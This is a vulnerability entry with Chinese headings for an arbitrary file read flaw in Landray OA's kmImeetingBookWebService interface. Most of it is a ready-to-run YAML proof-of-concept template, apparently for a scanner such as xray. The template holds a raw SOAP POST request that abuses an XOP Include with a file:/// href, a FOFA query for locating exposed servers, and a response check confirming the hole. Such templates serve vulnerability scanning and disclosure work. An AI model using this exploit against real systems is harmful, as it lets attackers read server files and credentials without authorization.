漏洞描述
Landray OA System kmImeetingBookWebService interface has an arbitrary file read vulnerability.
The vulnerability exists in the getImeetingBookLists method which can be exploited to read arbitrary files on the system.
FOFA: body="Com_Parameter"
landray-oa-kmImeetingBookWebService-fileread: Landray OA kmImeetingBookWebService File Read
PoC代码[已公开]
id: landray-oa-kmImeetingBookWebService-fileread
info:
name: Landray OA kmImeetingBookWebService File Read
author: ZacharyZcR
severity: high
verified: true
description: |
Landray OA System kmImeetingBookWebService interface has an arbitrary file read vulnerability.
The vulnerability exists in the getImeetingBookLists method which can be exploited to read arbitrary files on the system.
FOFA: body="Com_Parameter"
reference:
- https://github.com/wy876/POC/blob/9f20511bb02d7babac30c47f48a72d427b7f5a3b/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8CEKP%E7%B3%BB%E7%BB%9F%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88.md
tags: landray,fileread
created: 2024/12/30
set:
rboundary: randomLowercase(8)
hostname: request.url.host
rules:
r0:
request:
raw: |-
POST /sys/webservice/kmImeetingBookWebService HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Type: multipart/related; boundary=----{{rboundary}}
SOAPAction: ""
Accept-Encoding: gzip, deflate
------{{rboundary}}
Content-Disposition: form-data; name="a"
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.imeeting.km.kmss.landray.com/">
<soapenv:Header/>
<soapenv:Body>
<web:getImeetingBookLists>
<arg0>
<beginTimeStamp>a</beginTimeStamp>
<count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"/></count>
</arg0>
</web:getImeetingBookLists>
</soapenv:Body>
</soapenv:Envelope>
------{{rboundary}}--
expression: response.status == 500 && response.body.bcontains(b'Unmarshalling Error')
expression: r0()